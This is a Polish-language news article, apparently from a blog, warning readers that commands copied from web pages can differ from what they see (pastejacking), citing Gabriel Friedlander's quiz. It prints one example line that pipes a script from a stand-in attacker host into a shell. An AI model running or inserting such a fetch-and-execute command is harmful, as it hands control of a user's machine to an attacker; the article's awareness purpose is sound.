To prawda, że żyjemy w epoce, w której liczy się szybkość, a najważniejsze są szybkie rezultaty. Jednak niewiele osób zatrzymuje się na sekundę i myśli o konsekwencjach.
Każdego dnia miliony programistów, administratorów i badaczy bezpieczeństwa wykonują proste zadania, takie jak kopiowanie i wklejanie poleceń ze stron internetowych bezpośrednio do konsoli na swoich komputerach.
Chociaż wielu nawet o tym nie myśli, konsekwencje są znacznie poważniejsze i niebezpieczne, niż mogłoby się wydawać, zwłaszcza jeśli przechowujesz wrażliwe lub cenne dane.
Znany ekspert ds. bezpieczeństwa poświęcił czas, aby podzielić się tym, co się dzieje, gdy kopiujesz i wklejasz zawartość ze stron internetowych.
Kopiuj + wklej to łatwy sposób na zhakowanie
Gabriel Friedlander, założyciel platformy edukacji bezpieczeństwa Wizer, zdjął okładkę z diagramu, który sprawi, że zastanowisz się dwa razy przed skopiowaniem i wklejeniem poleceń ze stron internetowych.
Kopiowanie i wklejanie treści z Internetu stało się w dzisiejszych czasach tak powszechne, że nikt nawet o tym nie myśli.
Jednak Friedlander ostrzega, że niektóre strony internetowe są bardziej mylące, niż mogłoby się wydawać na pierwszy rzut oka, a to, co myślisz, że skopiowałeś, bardzo różni się od tego, co faktycznie zrobiłeś.
A co najgorsze, bez niezbędnej wiedzy i wskazówek ofiary uświadamiają sobie swój błąd dopiero po wstawieniu tekstu, w którym to momencie może być już za późno.
Analityk bezpieczeństwa zaprojektował również mały quiz dla swoich czytelników bloga, aby ludzie mogli naprawdę zrozumieć, jak łatwo nie chcesz otwierać drzwi cyberprzestępcom.
Dostarczało polecenia do skopiowania, ale istotna prawda jest ujawniana tylko wtedy, gdy wkleisz tekst i zobaczysz, co faktycznie wprowadziłeś w swojej konfiguracji.
Po skopiowaniu polecenia pokazanego na powyższym zrzucie ekranu wynik wklejenia Cię zszokuje, ponieważ jest daleki od tego, co myślałeś, że duplikujesz.
curl http://attacker-domain:8000/shell.sh | shOprócz zupełnie innego polecenia obecnego w schowku, znak nowej linii (lub powrotu) na końcu oznacza, że powyższy przykład zostanie wykonany, gdy tylko zostanie wstawiony bezpośrednio do terminala Linux.
Lepiej więc bądź świadomy tego, co się naprawdę dzieje i traktuj to jako poważne zagrożenie bezpieczeństwa. Nie mówimy, że wszystkie strony internetowe ukrywają złośliwą zawartość, ale powinieneś wziąć to pod uwagę.
Czy kiedykolwiek zostałeś zhakowany, wstawiając podchwytliwe polecenia do swojego terminala? Podziel się z nami swoim doświadczeniem w sekcji komentarzy poniżej.
Dodaj komentarz